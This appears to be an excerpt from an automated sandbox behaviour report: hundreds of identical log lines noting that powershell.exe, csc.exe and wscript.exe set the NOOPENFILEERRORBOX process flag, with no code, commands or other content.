                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
